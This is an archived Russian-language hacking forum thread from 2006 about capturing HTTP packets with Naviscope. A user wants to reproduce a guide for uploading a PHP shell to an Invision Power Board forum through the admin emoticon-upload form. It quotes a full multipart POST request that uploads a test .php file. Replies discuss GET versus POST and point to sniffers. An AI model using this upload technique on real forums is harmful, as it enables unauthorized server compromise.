PDA

Просмотр полной версии : Naviscope перехват пакета

alex-19841
14.06.2006, 06:35
Здесь есть хорошая статья как залить шелл на форум
http://antichat.ru/txt/IPB/index2.php
Там также дается пример перехваченного пакета
POST http://someSiteForum/admin.php?adsess=7456d367b18da87d161f59424a4e96f7 HTTP/1.0
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
Referer: http://someSiteForum/admin.php?adsess=7456d367b18da87d161f59424a4e96f7&act=op&code=emo
Accept-Language: ru
Content-Type: multipart/form-data; boundary=---------------------------7d43942c405bc
Proxy-Connection: Keep-Alive
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Content-Length: 677
Pragma: no-cache
Cookie: member_id=1; pass_hash=cf20fc37b4g0be45c1336f29d444e798;

-----------------------------7d43942c405bc
Content-Disposition: form-data; name="adsess"

7456d367b18da87d161f59424a4e96f7
-----------------------------7d43942c405bc
Content-Disposition: form-data; name="code"

emo_upload
-----------------------------7d43942c405bc
Content-Disposition: form-data; name="act"

op
-----------------------------7d43942c405bc
Content-Disposition: form-data; name="MAX_FILE_SIZE"

10000000000
-----------------------------7d43942c405bc
Content-Disposition: form-data; name="FILE_UPLOAD"; filename="c:/myFile.php"
Content-Type: application/octet-stream

<% echo("Hello from injected PHP script") %>
-----------------------------7d43942c405bc--
но у меня переватывается только
GET http://www.site.ru/forum/admin.php?adsess=adb5bdf51ef7561657e41a0587585012&act=op&code=emo HTTP/1.0
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Referer: http://www.site.ru/forum/admin.php?adsess=adb5bef51ef7563657e41a0587585012
Accept-Language: en-us
Proxy-Connection: Keep-Alive
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.1)
Host: www.site.ru
Cookie: cnstid=12519652; member_name=user; member_password=as694a33b5945691629dee124b813e33; member_newpm=0; member_id=1; pass_hash=as694a33b5945691629dee124b813e33; member_newpm=0; PHPSESSID=adabe49374adf90a5687a8203c24e50b
можно ли какнибудь также перехватить или где можна найти вот эту часть
-----------------------------7d43942c405bc
Content-Disposition: form-data; name="adsess"

7456d367b18da87d161f59424a4e96f7
-----------------------------7d43942c405bc
Content-Disposition: form-data; name="code"

emo_upload
-----------------------------7d43942c405bc
Content-Disposition: form-data; name="act"

op
-----------------------------7d43942c405bc
Content-Disposition: form-data; name="MAX_FILE_SIZE"

10000000000
-----------------------------7d43942c405bc
Content-Disposition: form-data; name="FILE_UPLOAD"; filename="c:/myFile.php"
Content-Type: application/octet-stream

<% echo("Hello from injected PHP script") %>
-----------------------------7d43942c405bc--
IPB v1.3.1
Зарание спасибо
Ээх
14.06.2006, 07:28
Если надо только перехватить пакет - поставь Ethereal или Proxomitron. Хотя скорее всего Навископ перехватывает то, что есть. Просто форум другого "типа".
hidden
14.06.2006, 07:43
Это всё что твой браузер послал, еслиб он посылал что-то кроме заголовка, он бы также послал его длину, как в первом варианте.
Content-Length: 677
Так что перехватываешь ты, не то.
alex-19841
14.06.2006, 08:12
Перехватываю не то
Я открываю страницу Manege Emotions c browse кнопкой в низу и смотрю что naviscope показал.
Ээх
14.06.2006, 10:28
Вполне нормальный ответ на запрос Get. В твоем же примере стоял Post. ИМХО - ты зашел не на такой форум, как в твоем примере.
GreenBear
14.06.2006, 10:58
Помоему стоит лучше перехватить запрос на загрузку файла =)
Ээх
14.06.2006, 11:33
ИМХО, ты просто зашел не на такой форум, как в твоем примере. В примере запрос Post, а в твоем случае - Get. А Get`ом много не передашь.
Навископ просто делает свое дело, довит то, что есть.
hidden
14.06.2006, 18:50
ИМХО, ты просто зашел не на такой форум, как в твоем примере. В примере запрос Post, а в твоем случае - Get. А Get`ом много не передашь.
Навископ просто делает свое дело, довит то, что есть.
Не на одном форуме файлы GETом не передают, так-что ты передаёшь не ту инфу.

Представляю, как-бы, хотя-бы 100кб-ная картинка через GET передавалась бы, хотя если её забэйсить и передовать уже 150кб текста :D
alex-19841
14.06.2006, 22:20
я пробовал валовить пакет в процессе upload, но ниче не вылавливеатся кроме
HTTP/1.0 200 OK
Date: Wed, 14 Jun 2006 18:16:40 GMT
Server: Apache
X-Powered-By: PHP/5.1.4
Connection: close
Content-Type: text/html
hidden
14.06.2006, 22:25
А это ты выловил то, что вернул тебе сервер.
Попробуй [это] (http://rapidshare.de/files/21800790/NetSniffer.rar.html) для отлавливания пакетов пароль antichat.